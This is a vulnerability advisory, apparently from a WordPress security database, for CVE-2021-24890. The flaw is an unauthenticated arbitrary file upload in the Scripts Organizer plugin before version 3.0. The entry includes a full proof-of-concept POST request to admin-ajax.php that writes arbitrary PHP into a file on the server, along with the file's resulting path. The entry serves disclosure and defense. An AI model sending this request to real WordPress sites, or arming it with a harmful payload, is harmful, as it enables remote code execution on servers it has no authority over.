Lucene search
Ovidiu MaghetiuWPEX-ID:F3B450D2-84CE-4C13-AD6A-B60785DEE7E7HistorySep 05, 2022 - 12:00 a.m.
Scripts Organizer < 3.0 - Unauthenticated Arbitrary File Upload
2022-09-0500:00:00
Ovidiu Maghetiu
74
unauthenticated arbitrary file upload
post
scripts organizer
EPSS
0.001
Percentile
40.8%
The plugin does not have capability and CSRF checks in the saveScript AJAX action, available to both unauthenticated and authenticated users, and does not validate user input in any way, which could allow unauthenticated users to put arbitrary PHP code in a file
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 295
action=saveScript&php_script=%22%3C%3Fphp+die('test')%3B%22&SCORG_enable_script=1&form_data=post_status%3Dpublish%26post_name%3Dtest%26post_author%3D1%26post_name%3Dtest%26post_ID%3D200%26post_title%3Dtest%26SCORG_enable_script%3D1%26SCORG_trigger_location%3Deverywhere%26SCORG_script_type%3Dphp
The file will be at https://example.com/wp-content/uploads/scripts-organizer/200.phpReferences
Related
cnvd
cnvd
WordPress Scripts Organizer Arbitrary File Upload Vulnerability
2022-09-28 00:00:00
cvelist
cvelist
nvd
nvd
CVE-2021-24890
2022-09-26 13:15:09
cve
cve
CVE-2021-24890
2022-09-26 13:15:09
prion
prion
Cross site request forgery (csrf)
2022-09-26 13:15:00
patchstack
patchstack
wpvulndb
wpvulndb
Scripts Organizer < 3.0 - Unauthenticated Arbitrary File Upload
2022-09-05 00:00:00